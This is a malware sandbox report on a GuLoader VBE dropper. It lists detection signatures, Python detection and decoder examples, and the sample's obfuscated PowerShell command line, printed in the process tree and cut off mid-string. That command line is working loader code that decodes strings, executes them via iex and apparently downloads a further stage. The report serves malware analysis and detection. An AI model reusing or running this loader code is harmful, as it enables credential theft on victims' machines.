Windows
Analysis Report
Inquiry Studbolt - 240703.vbe
Overview
General Information
Detection
GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Yara detected Powershell download and execute
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
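The execution-chain signatures above (WScript or CScript dropper, Wscript starts Powershell, very long command line, VBE execution via Cscript/Wscript) can be expressed as one check over process-creation events. The following is an added example, not part of the sandbox report: it uses Sysmon Event ID 1 style field names, a command-line length threshold of 1000 characters chosen here for illustration, and constructed events modelled on the process tree further down (the PowerShell padding text and the explorer.exe parent PIDs are synthesised).

```python
# Added example: turn the report's execution-chain signatures into a check over
# process-creation events. Field names follow Sysmon Event ID 1; the sample
# events are constructed for this example, not taken from a real log.
from dataclasses import dataclass
import re


@dataclass
class ProcessEvent:
    pid: int
    image: str
    command_line: str
    parent_pid: int
    parent_image: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Script file types the report's Sigma rule names (WSF/JSE/JS/VBA/VBE via Cscript/Wscript).
SCRIPT_EXTS = re.compile(r"\.(vbe|vbs|jse|js|wsf)\b", re.IGNORECASE)
LONG_CMDLINE = 1000  # threshold in characters (assumption chosen for this example)


def basename(path: str) -> str:
    """Last path component, lower-cased, so quoting and drive letters do not matter."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, reason) tuples for every event matching one of the three checks."""
    findings = []
    for ev in events:
        img, parent = basename(ev.image), basename(ev.parent_image)
        if parent in SCRIPT_HOSTS and img == "powershell.exe":
            findings.append((ev.pid, "script host spawned powershell"))
        if img in SCRIPT_HOSTS and SCRIPT_EXTS.search(ev.command_line):
            findings.append((ev.pid, "script host executing script file"))
        if len(ev.command_line) > LONG_CMDLINE:
            findings.append((ev.pid, "very long command line"))
    return findings


# Constructed events. PIDs 9044 and 2680 and the two image paths mirror the
# process tree in the report; the padding text stands in for the real one.
SALAD = "Nugacities Komedianter104 Palatalise " * 40  # about 1500 characters
PS_CMD = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
          '"cls;write \'' + SALAD + '\';If (${host}.CurrentCulture){$Smaastykker++;}"')

SAMPLE_EVENTS = [
    ProcessEvent(9044, r"C:\Windows\System32\WScript.exe",
                 r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry Studbolt - 240703.vbe"',
                 5000, r"C:\Windows\explorer.exe"),
    ProcessEvent(2680, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 PS_CMD, 9044, r"C:\Windows\System32\WScript.exe"),
    # Benign control: PowerShell started by explorer.exe with a short command line.
    ProcessEvent(4242, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Date",
                 4000, r"C:\Windows\explorer.exe"),
]


def detect_sample():
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for pid, reason in detect_sample():
        print(pid, reason)
```

Run stand-alone it reports three findings: the VBE launched by wscript.exe (PID 9044), and PowerShell PID 2680 both for its wscript.exe parent and for its command-line length; the explorer-launched PowerShell produces nothing.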
Classification
- System is w10x64native
- wscript.exe (PID: 9044 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry Studbolt - 240703.vbe" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
  - powershell.exe (PID: 2680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGaz HuiKal,elB eaDa/p,5La .Fr0Ru He( A WPuiCun UdKuo .wSl s l .N sTE p Li1 B0Fy .P,0.y;I. .eWCaiB,nS ,6Di4Te;Vi Bx,o6E.4, i;No BurUl vGl:Un1Co2 Sy1D.. U0 n)Sw IGSce V c.hkCyoN o/ C2Ch0cu 1tr0di0Ko1 Dr0Pe1Li A wF.ni drAr eOrfT.oSix Co/R 1 2Re 1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSt tso ';$Redesignating=Immatrikulationens ' RhAft Ct BepS sKu:V a/ P/ .dat rUdiF,vOve Sa. UgTaoS ko,eg UlSo eCa.Syc Uo emVe/,euB ecKr?D,eCo xI,p Ko ,r StIn=,edI ro .wK.n.e l,roChagld .a&Fristd. e=Ac1N,T u TaX o3InpK aGRoV .QOm O Mu AYReu D.NOv0UnPM oVFifA.0s. S ,1PrvChu SaO,eoK.v, uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'F riSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGa cF,h Fo,r .l%K.a epA lpSpdJiaOu tPeaU,%,l\ FrBMoe ol YlAteT rKi iPacUn7C.4 F.G,AB,f RsEk Fo&St &K, HeCyc DhKloCo U. t n ';Influerende (Immatrikulationens 'T i$ExgAllId oHubbea Kl sa: .CDehJ eaHecSpoCu n Nn FeGur Us J1 S7A ,2.v=Be(Ca cCamMadS S i/TucEx Co $P.PTwaSir Deas.s,ft AaAedReeKo sPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTu anolL :KrH KoyBag .iD ieI,jUnnSk e uk Oo am VemEksMii oo .nUbeDe nUdsW,= T$ DeRJae.jd Ee .sBiiIn gOpn,saYat riSonFeg T.C.s.vpB. lGei StUn( Fa$ UB o A u.tr FrBye P.) ');Influerende (Immatrikulationens ' T[ IN ie UrtPs.P S, beRer Iv . iTicReeDuP Plo iiAfno ,tLiMS,aLi n Ta hg Me KorDi]no:F i: SPre,gc S,uTir iUn t,eyAmPBrr Ceo etTroU scstoSvl E ,o= T I [ AnNDreUnt.
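The PowerShell stage above hides every string behind one routine: Immatrikulationens sets $Smaastykker to 1, builds the method name 'SUBsTRIng' from two pieces, and then collects $Marios.Substring($i, 1) for $i = 2, 5, 8, ... while $i is less than Length - 1, so the plaintext is every third character of the literal starting at index 2, and the final character is never examined. Influerende dot-sources its argument through $Gnier111, so once $Gnier111 decodes to an invocation cmdlet the remaining literals are executed as code. The following re-implementation of that decoder is an added example, not code from the report or from the sample. The three sample literals are copied from the command line above; because the report wraps the command line into 10-character pieces and the decoder is position-sensitive, the spacing used here is my reconstruction of the original literals and is an assumption.

```python
# Added example (not from the report): re-implementation of the sample's
# string decoder, the function the command line names Immatrikulationens.

def decode_every_third(encoded: str, start: int = 2, step: int = 3) -> str:
    """Mirror of Immatrikulationens.

    $Smaastykker is 1 (it is incremented from undefined), so the loop bound
    $Syntomy is Length - 1 and the loop runs for $i = 2, 5, 8, ... while
    $i -lt $Syntomy, taking $Marios.Substring($i, 1) each time.
    """
    limit = len(encoded) - 1   # $Syntomy = $Marios.Length - $Smaastykker
    out = []
    i = start
    while i < limit:           # -lt, so the last character is never reached
        out.append(encoded[i]) # Substring($i, 1)
        i += step
    return "".join(out)


# Sample literals copied from the command line above, with the report's
# 10-character wrapping undone. The exact whitespace inside each literal is
# reconstructed (an assumption); the decoder shifts every later pick if it is off.
SAMPLE_LITERALS = {
    "Dissers":  "G U Es ne .r,e-IdA agEmeS,nSttso ",   # header name used for the request
    "Bourre":   "s,>I ",                                # one-character separator
    "Gnier111": "FriSke Ix ",                           # name Influerende dot-sources through
}


def decode_all(literals=SAMPLE_LITERALS) -> dict:
    """Decode every literal; returns {variable name: plaintext}."""
    return {name: decode_every_third(value) for name, value in literals.items()}


if __name__ == "__main__":
    for name, plain in decode_all().items():
        print(f"${name} = {plain!r}")
```

Under the reconstructed spacing, $Dissers decodes to the header name User-Agent (consistent with the signature "Uses a known web browser user agent for HTTP communication"), $Bourre to the single character > and $Gnier111 to iex, which is what makes each Influerende call execute its decoded argument. The only way to confirm the remaining literals ($Sclaffs, $Redesignating, $Parastades) is to recover their exact spacing from the original sample, since a single extra or missing space changes every later pick.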